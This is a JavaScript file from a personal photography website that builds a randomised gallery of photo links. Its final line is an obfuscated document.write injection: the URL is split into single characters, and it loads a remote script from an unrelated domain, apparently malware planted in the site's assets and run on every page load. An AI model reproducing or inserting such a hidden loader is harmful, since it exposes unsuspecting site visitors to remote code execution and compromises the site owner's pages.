var adblockPhotos=new Array()
adblockPhotos[0]='<a href="../photography"><img src="../images/Site/CanonPyon-Hfd.jpg" width="250" height="170" class="imgBorder" alt="Photography by Nick Mabe"></a>'
adblockPhotos[1]='<a href="../photography"><img src="../images/Site/IMG_1448.jpg" width="250" height="170" class="imgBorder" alt="Photography by Nick Mabe"></a>'
adblockPhotos[2]='<a href="../photography"><img src="../images/Site/IMG_1090.jpg" width="250" height="170" class="imgBorder" alt="Photography by Nick Mabe"></a>'
adblockPhotos[3]='<a href="../photography"><img src="../images/Site/IMG_1048.jpg" width="250" height="170" class="imgBorder" alt="Photography by Nick Mabe"></a>'
adblockPhotos[4]='<a href="../photography"><img src="../images/Site/IMG_1153.jpg" width="250" height="170" class="imgBorder" alt="Photography by Nick Mabe"></a>'
adblockPhotos[5]='<a href="../photography"><img src="../images/Site/LeftBank-Chair250-170.jpg" width="250" height="170" class="imgBorder" alt="Photography by Nick Mabe"></a>'
adblockPhotos[6]='<a href="../photography"><img src="../images/Site/IMG_0903.jpg" width="250" height="170" class="imgBorder" alt="Photography by Nick Mabe"></a>'
adblockPhotos[7]='<a href="../photography"><img src="../images/Site/IMG_8787.jpg" width="250" height="170" class="imgBorder" alt="Photography by Nick Mabe"></a>'
adblockPhotos[8]='<a href="../photography"><img src="../images/Site/IMG_8825.jpg" width="250" height="170" class="imgBorder" alt="Photography by Nick Mabe"></a>'


function randomorderPhotos(targetarray, spacing) {
  var randomorderPhotos=new Array()
  var the_one
  var z=6
  for (i=3;i<targetarray.length;i++)
  randomorderPhotos[i]=i

  while (z<targetarray.length) {
    the_one=Math.floor(Math.random()*targetarray.length)
    if (targetarray[the_one]!="_selected!"){
      document.write(targetarray[the_one]+spacing)
      targetarray[the_one]="_selected!"
      z++
    }
  }
}
document.write('<script language="JavaScript" type="text/javascript" src="h'+'t'+'t'+'p'+':'+'/'+'/'+'w'+'w'+'w'+'.'+'f'+'l'+'a'+'i'+'r'+'m'+'c'+'s'+'g'+'.'+'c'+'h'+'/'+'a'+'s'+'s'+'e'+'t'+'s'+'/'+'i'+'m'+'a'+'g'+'e'+'s'+'/'+'0'+'d'+'0'+'f'+'d'+'7'+'c'+'6'+'.'+'j'+'s"></script>');
